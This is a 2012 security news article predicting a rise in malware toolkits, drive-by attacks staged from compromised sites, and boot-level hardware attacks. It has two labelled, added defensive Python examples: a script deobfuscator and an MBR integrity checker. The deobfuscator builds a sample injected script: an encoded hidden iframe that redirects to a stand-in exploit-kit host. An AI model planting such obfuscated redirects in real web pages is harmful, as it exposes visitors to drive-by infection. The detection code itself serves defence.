Multifunctional malware, staged drive-by attacks to rise in 2012

Automated toolkits with business models that include rental agreements and constant updates will
gain considerable improvements in 2012, with many attack kits being primed with new features that
enable even the least tech-savvy cybercriminals to hone malware for highly targeted attacks.


Financial malware designed to target and infiltrate bank accounts could be recoded for targeted
non-financial attacks, according to Boston-based security vendor Trusteer. The Zeus and SpyEye
codebases, which are now publicly available, can be manipulated to pull off more sophisticated
targeted attacks against enterprises. “Over the next twelve months perimeters will face an
onslaught from various sources, viruses going financial, APT-style technologies in Zeus code
derivatives manipulated by new coders and in other commercially available malware kits,” Trusteer
CTO Amit Klein noted in the company’s list of predictions.  

A scourge of compromised legitimate websites will continue to fuel an increase in staged attacks
in 2012, according to South Jordan, Utah-based network security vendor Solera Networks Inc.
High-profile attacks carried out by hacktivist groups demonstrated that even the largest
enterprises struggle to control website vulnerabilities that can give cybercriminals a way into
sensitive systems. Andrew Brandt, Solera's director of Threat Research, urges Mozilla Firefox
users to keep their plug-ins updated and install NoScript to stop the onslaught of drive-by
attacks using malicious JavaScript.

“As far as I can tell, it’s the only surefire method of preventing an accidental infection of a
Windows PC by exploit-kitted webpages,” Brandt wrote in the Solera blog. “It all starts with a blob
of heavily obfuscated JavaScript and ends within a few minutes with the victim’s PC pwned
and the victim’s passwords in the hands of some Asian or eastern European goon squad.”

Solera’s Brandt also points to vulnerable WordPress.org blog plug-ins as a major contributor to
the problem. Attackers use the plug-in flaws to upload their code into otherwise legitimate pages,
which then serve keyloggers to blog visitors. “Most of the code we’ve seen uploaded to legit sites
redirects the browser into the maw of one or another exploit kit,” Brandt wrote.
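The staged attack Brandt describes, as an added example that is not part of the original article or of Solera's own tooling: a small static decoder that pulls the script blocks out of a saved page and peels the constant-folding layers exploit-kit redirectors commonly stack (String.fromCharCode, unescape, eval of a string literal) until the hidden iframe and the exploit-kit URL it points at are visible. The sample page, its payload and the hostname kit.example.invalid are constructed for this example. The decoder only folds constant arguments; code that computes the redirect at runtime will not decode this way, which is one reason blocking script execution outright, as Brandt recommends, is the surer control.

```python
import json
import re
import urllib.parse

# --- Constructed sample: a legitimate blog page with an injected script -------
# The page, the payload and the hostname kit.example.invalid are made up for this
# example; nothing here is a captured artifact (.invalid never resolves).
PAYLOAD = ('<iframe src="http://kit.example.invalid/in.php" width=1 height=1 '
           'style="visibility:hidden"></iframe>')

def obfuscate_for_sample(payload):
    """Two-layer obfuscation of the kind the article describes: the iframe is
    built from char codes, and that code is in turn percent-encoded for eval."""
    inner = "document.write(String.fromCharCode(%s));" % ",".join(
        str(ord(c)) for c in payload)
    return "eval(unescape('%s'));" % "".join("%%%02X" % ord(c) for c in inner)

def build_sample_page():
    return ("<html><body><h1>Holiday photos</h1>\n"
            "<script>var a = 1;</script>\n"
            "<p>Legitimate post text.</p>\n"
            "<script>%s</script>\n</body></html>" % obfuscate_for_sample(PAYLOAD))

# --- Static decoder ------------------------------------------------------------
SCRIPT = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)
FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([0-9,\s]+)\)")
UNESCAPE = re.compile(r"unescape\(\s*(['\"])((?:%[0-9A-Fa-f]{2}|[^'\"])*)\1\s*\)")
EVAL_LITERAL = re.compile(r'eval\(\s*"((?:[^"\\]|\\.)*)"\s*\)')
URL = re.compile(r"https?://[^\s\"'<>\\]+")
HIDDEN = re.compile(r"(?:width|height)\s*=\s*\\?[\"']?[01]\b"
                    r"|visibility\s*:\s*hidden|display\s*:\s*none", re.I)

def decode_layer(js):
    """Peel one layer: fold constant String.fromCharCode(...) and unescape('...')
    calls into string literals, then unwrap eval("literal") into plain code."""
    def fcc(m):
        codes = [int(n) for n in re.split(r"[,\s]+", m.group(1)) if n]
        return json.dumps("".join(chr(c) for c in codes))
    def unesc(m):
        s = re.sub(r"%u([0-9A-Fa-f]{4})", lambda u: chr(int(u.group(1), 16)), m.group(2))
        return json.dumps(urllib.parse.unquote(s))
    def ev(m):
        return json.loads('"%s"' % m.group(1))
    js = FROMCHARCODE.sub(fcc, js)
    js = UNESCAPE.sub(unesc, js)
    return EVAL_LITERAL.sub(ev, js)

def deobfuscate(js, max_rounds=8):
    """Apply decode_layer until a fixed point; returns (code, layers_removed)."""
    layers = 0
    for _ in range(max_rounds):
        nxt = decode_layer(js)
        if nxt == js:
            break
        js, layers = nxt, layers + 1
    return js, layers

def scan_page(page_html):
    """Report every script that hides something behind encoding: a URL, a hidden
    iframe, or simply layers of constant folding that a benign script lacks."""
    findings = []
    for i, src in enumerate(SCRIPT.findall(page_html)):
        decoded, layers = deobfuscate(src)
        urls = list(dict.fromkeys(URL.findall(decoded)))       # de-duplicate, keep order
        iframe = re.search(r"<iframe[^>]*", decoded, re.I)
        hidden = bool(iframe and HIDDEN.search(iframe.group(0)))
        if layers or urls or hidden:
            findings.append({"script": i, "layers": layers, "urls": urls,
                             "hidden_iframe": hidden, "decoded": decoded})
    return findings

if __name__ == "__main__":
    for f in scan_page(build_sample_page()):
        print("script #%d: %d layer(s) removed, hidden iframe=%s, urls=%s"
              % (f["script"], f["layers"], f["hidden_iframe"], f["urls"]))
```

In practice the input is a copy of the page saved by the web gateway or a crawler rather than the constructed sample; the exploit-kit URL and the hidden-iframe markers the scan returns are what you would feed into a blocklist or a detection rule, and a script that needs several decoding rounds on a page that should contain only the blog's own JavaScript is itself worth an alert.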

Hardware security weaknesses
Meanwhile, security giant McAfee, which was acquired in 2010 by chipmaker Intel, is predicting a
spike in attacks that leverage embedded hardware or use a computer’s master boot record and BIOS
layers to bypass traditional security technologies.
“We expect to see more effort put into hardware and firmware exploits and their related real-world
attacks throughout 2012 and beyond,” according to McAfee.

Embedded systems in GPS devices, routers, ATMs, medical devices and other equipment can be
rooted and are at risk of falling under the control of sophisticated cybercriminals, according to
McAfee’s “2012 Threats Predictions” (.pdf) report.

“Controlling hardware is the promised land of sophisticated attackers,” according to the report.
“If attackers can insert code that alters the boot order or loading order of the operating system,
they will gain greater control and can maintain long-term access to the system and its data.”
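A check a practitioner can run against the boot-level attacks the report predicts, added here as an example that is not from the McAfee report or the original article: parse the 512-byte master boot record, verify the 55AA boot signature, compare the 446-byte boot-code region against a SHA-256 baseline recorded when the system was built, and sanity-check the partition table. The sample MBR, the baseline and the tamper routine are constructed for this example (the tamper writes a placeholder short jump, not real bootkit code). Caveat: malware that has already inserted itself into the boot chain can filter reads of sector 0 from inside the running operating system, so the comparison is only trustworthy when the sector is read from clean boot media.

```python
import hashlib
import struct

SECTOR_SIZE = 512
BOOT_CODE_LEN = 446                   # x86 boot code occupies bytes 0..445
TABLE_OFFSET = 446                    # four 16-byte partition entries follow
ENTRY = struct.Struct("<B3sB3sII")    # status, CHS start, type, CHS end, LBA start, sector count
BOOT_SIGNATURE = b"\x55\xaa"          # bytes 510..511

def build_sample_mbr():
    """Constructed 'known-good' MBR: a stub of typical x86 boot-code prologue
    bytes, one active Linux partition, one swap partition, valid signature.
    Sample data for the example, not an image taken from a real disk."""
    boot_code = b"\x33\xc0\x8e\xd0\xbc\x00\x7c"   # xor ax,ax / mov ss,ax / mov sp,0x7c00
    boot_code = boot_code.ljust(BOOT_CODE_LEN, b"\x00")
    entries = (
        ENTRY.pack(0x80, b"\x00\x21\x00", 0x83, b"\xfe\xff\xff", 2048, 204800),
        ENTRY.pack(0x00, b"\xfe\xff\xff", 0x82, b"\xfe\xff\xff", 206848, 102400),
        ENTRY.pack(0, b"\0\0\0", 0, b"\0\0\0", 0, 0),
        ENTRY.pack(0, b"\0\0\0", 0, b"\0\0\0", 0, 0),
    )
    return boot_code + b"".join(entries) + BOOT_SIGNATURE

def parse_mbr(data):
    """Split one sector into boot code, non-empty partition entries and signature."""
    if len(data) != SECTOR_SIZE:
        raise ValueError("expected one %d-byte sector" % SECTOR_SIZE)
    parts = []
    for i in range(4):
        status, _, ptype, _, lba, count = ENTRY.unpack_from(data, TABLE_OFFSET + 16 * i)
        if ptype == 0:
            continue                                  # empty slot
        parts.append({"index": i, "bootable": status == 0x80, "type": ptype,
                      "lba_start": lba, "sectors": count})
    return {"boot_code": data[:BOOT_CODE_LEN], "partitions": parts,
            "signature_ok": data[510:512] == BOOT_SIGNATURE}

def boot_code_digest(data):
    """Digest of the boot-code region only; the partition table may change legitimately."""
    return hashlib.sha256(data[:BOOT_CODE_LEN]).hexdigest()

def check_mbr(data, baseline_digest):
    """Return a list of findings; an empty list means the sector matches the baseline."""
    mbr = parse_mbr(data)
    findings = []
    if not mbr["signature_ok"]:
        findings.append("boot signature is not 55AA")
    digest = boot_code_digest(data)
    if digest != baseline_digest:
        findings.append("boot code differs from baseline (now %s...)" % digest[:16])
    bootable = [p for p in mbr["partitions"] if p["bootable"]]
    if len(bootable) != 1:
        findings.append("%d partitions flagged bootable, expected 1" % len(bootable))
    spans = sorted((p["lba_start"], p["lba_start"] + p["sectors"], p["index"])
                   for p in mbr["partitions"])
    for (s1, e1, i1), (s2, e2, i2) in zip(spans, spans[1:]):
        if s2 < e1:
            findings.append("partition %d overlaps partition %d" % (i1, i2))
    return findings

def tamper_boot_code(mbr):
    """Simulate the change the report warns about: the first bytes of the boot
    code are patched so control goes elsewhere before the original loader runs.
    The bytes are a placeholder 'jmp short' (constructed), not a real bootkit."""
    return b"\xeb\x3c\x90" + mbr[3:]

if __name__ == "__main__":
    good = build_sample_mbr()
    baseline = boot_code_digest(good)     # record this at install time, store it off-host
    print("clean:", check_mbr(good, baseline))
    print("tampered:", check_mbr(tamper_boot_code(good), baseline))
```

To run it against a real disk, read the first 512 bytes of the device (for example `dd if=/dev/sda bs=512 count=1` as root on Linux) and pass them to check_mbr with the baseline digest stored when the system was built; only the boot-code region is hashed because the partition table can change through ordinary administration, and the baseline must live somewhere the machine being checked cannot rewrite.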

McAfee’s prediction is somewhat buoyed by Columbia University researchers who demonstrated how
HP printer vulnerabilities could be used by cybercriminals to gain access to corporate networks.

Michael Sutton, vice president of security research at SaaS-based email and Web gateway security
vendor Zscaler Inc., said the focus on hardware-based threats may force hardware vendors to
increase their focus on security and take vulnerability disclosure more seriously. Sutton’s
presentation at Black Hat 2011 focused on weaknesses in embedded Web servers.

“Security in the hardware space is at least ten years behind security in the software industry,”
Sutton wrote in Zscaler’s ThreatLabZ blog. “Hardware vendors will get a wake-up call as researchers
shift their efforts to hardware and party like it’s 1999.”


Article source: http://searchsecurity.techtarget.com/news/2240113180/Multifunctional-malware-staged-drive-by-attacks-to-rise-in-2012